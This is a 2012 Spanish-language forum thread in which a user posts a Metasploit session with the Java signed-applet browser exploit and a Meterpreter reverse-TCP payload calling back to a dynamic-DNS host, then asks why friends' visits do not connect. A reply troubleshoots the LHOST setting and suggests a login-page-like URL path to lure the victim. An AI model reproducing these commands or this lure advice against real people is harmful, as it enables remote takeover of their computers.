Título: Ayuda con metasploit Publicado por: BlackSS en 6 Octubre 2012, 00:02 am Buenas, estamos practicando el metasploit con unos amigos (Supongo que un tema sobre metasploit va aqui) Ahora vereis lo que me dice el metasploit, la version que es y en lo que falla.
Please wait while the Metasploi Starting Metasploit Console... __________________________________ | | METASPLOIT CYBE |__________________________________ \ \ . \ \ \ + * X / / / / . / . / / * + #### __ __ __ #### / \ / \ / \ # ################################### ################################### # WAVE 4 ######## SCORE 31337 ##### =[ metasploit v4.4.0-release + -- --=[ 902 exploits - 528 auxili + -- --=[ 250 payloads - 28 encoder Successfully loaded plugin: pro msf > use exploit/multi/browser/java_sign ed_applet msf exploit(java_signed_applet) > set PA YLOAD java/meterpreter/reverse_tcp PAYLOAD => java/meterpreter/reverse_tcp msf exploit(java_signed_applet) > set LH OST blackss.zapto.org LHOST => blackss.zapto.org msf exploit(java_signed_applet) > set TA RGET 0 TARGET => 0 msf exploit(java_signed_applet) > set UR IPATH /set SRVPORT 8080 URIPATH => /set SRVPORT 8080 msf exploit(java_signed_applet) > set LP ORT 4444 LPORT => 4444 msf exploit(java_signed_applet) > exploi t Exploit running as background job. msf exploit(java_signed_applet) > [-] Handler failed to bind to 85.61.16.10 1:4444 Started reverse handler on 0.0.0.0:44 44 Using URL: http://0.0.0.0:8080/set SR VPORT 8080 Local IP: http://192.168.1.12:8080/s et SRVPORT 8080 Server started. Ahora se supone que mi amigo, que entra a blackss.zapto.org:8080 deberia salirme en el metasploit. El problema es que no sale. Cuando ellos se meten, lo que les sale es : Esta página web no está disponible Se ha interrumpido la conexión con blackss.zapto.org. Esto sale en chrome, despues de esperar un rato. Cual es el problema? Los comandos a utilizar fueron : use exploit/multi/browser/java_signed_applet set PAYLOAD java/meterpreter/reverse_tcp set LHOST reasen.zapto.org set TARGET 0 set URIPATH / set SRVPORT 8080 set LPORT 4444 exploit La version de metasploit es : metasploit v4.4.0-release Agradeceria mucho que respondieran y lo arreglaran... Título: Re: Ayuda con metasploit Publicado por: Epzylon en 9 Octubre 2012, 22:44 pm Estas usando mail metasploit:
Para empezar esto es un error: Código: Handler failed to bind to 85.61.16.10 LHOST -> Debe ir tu ip local. Si tu ip es 85.61.16.10 esta bien, Si no NO. A esta ip debe acceder tu victima. URLPATH -> tiene que ser algo como /login.htm o algo asi, es para simular el acceso a una web. Aún que no soy experto en el tema, creo que tenes que leer mas para poder saber que estas haciendo. Creo que este link te va a ayudar: http://www.offensive-security.com/metasploit-unleashed/Java_Applet_Infection (http://www.offensive-security.com/metasploit-unleashed/Java_Applet_Infection) |